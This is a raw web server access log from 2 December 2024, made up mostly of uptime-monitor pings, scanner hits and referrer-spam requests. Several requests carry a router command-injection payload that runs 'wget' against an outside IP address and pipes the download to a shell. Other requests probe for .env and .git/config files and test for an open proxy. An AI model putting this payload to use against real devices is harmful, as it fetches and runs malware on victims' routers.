77.105.166.134 - - [02/Dec/2024:13:18:57 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:13:19:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.216.134.198 - - [02/Dec/2024:13:19:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [02/Dec/2024:13:20:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.246.212.211 - - [02/Dec/2024:13:21:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
162.216.150.225 - - [02/Dec/2024:13:21:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [02/Dec/2024:13:21:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [02/Dec/2024:13:22:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Dec/2024:13:22:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [02/Dec/2024:13:22:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.138.234 - - [02/Dec/2024:13:23:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Dec/2024:13:23:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [02/Dec/2024:13:23:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.138.234 - - [02/Dec/2024:13:24:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Dec/2024:13:24:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:13:24:41 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
77.105.166.134 - - [02/Dec/2024:13:25:01 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:01 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:03 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:03 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:05 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:05 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
154.213.187.20 - - [02/Dec/2024:13:25:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
49.156.46.66 - - [02/Dec/2024:13:25:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:26 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:26 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:28 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [02/Dec/2024:13:25:28 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
212.91.246.72 - - [02/Dec/2024:13:25:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:25:30 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:25:30 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
31.220.1.88 - - [02/Dec/2024:13:26:12 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
31.220.1.88 - - [02/Dec/2024:13:26:16 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
179.43.163.250 - - [02/Dec/2024:13:26:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [02/Dec/2024:13:26:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [02/Dec/2024:13:26:22 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [02/Dec/2024:13:26:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [02/Dec/2024:13:26:24 +0100] "GET /prod/.env HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:13:26:24 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "l9explore/1.2.2"
212.91.246.72 - - [02/Dec/2024:13:26:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:27:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:28:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:29:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:13:29:50 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:13:30:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:31:11 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:11 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:13 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:13 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:16 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:16 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:13:31:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:31:36 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:36 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:38 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:38 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:31:40 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:13:31:40 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
212.91.246.72 - - [02/Dec/2024:13:32:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:33:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:34:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.249.246.17 - - [02/Dec/2024:13:34:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
45.249.246.17 - - [02/Dec/2024:13:34:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.249.246.17 - - [02/Dec/2024:13:35:00 +0100] "t3 12.1.2" 400 329 "-" "-"
45.148.121.115 - - [02/Dec/2024:13:35:08 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
101.36.127.24 - - [02/Dec/2024:13:35:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 8_2; Win64; x64) AppleWebKit/539.48 (KHTML, like Gecko) Chrome/94.0.88 Safari/537.36"
101.36.127.24 - - [02/Dec/2024:13:35:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
101.36.127.24 - - [02/Dec/2024:13:35:09 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
101.36.127.24 - - [02/Dec/2024:13:35:09 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:13:35:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:36:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:37:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:37:30 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:37:30 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:37:32 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:37:32 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:37:34 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:37:34 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:37:58 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:37:58 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
49.51.253.26 - - [02/Dec/2024:13:37:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
77.105.166.134 - - [02/Dec/2024:13:38:00 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:38:00 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:38:02 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:38:02 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:13:38:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:39:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:40:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:13:41:18 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:13:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:43:53 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:43:53 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:43:55 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:13:43:55 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:13:43:57 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:43:57 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:44:23 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:44:23 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:44:25 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:44:26 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:44:28 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:44:28 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:13:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.187.20 - - [02/Dec/2024:13:45:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
45.148.121.115 - - [02/Dec/2024:13:45:28 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:13:45:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.121.115 - - [02/Dec/2024:13:46:37 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:13:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:48:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:13:48:36 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:13:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:50:25 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:25 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:27 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:27 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:30 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:30 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:13:50:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:13:50:54 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:54 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:56 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:56 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:58 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:13:50:58 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:13:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:13:52:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
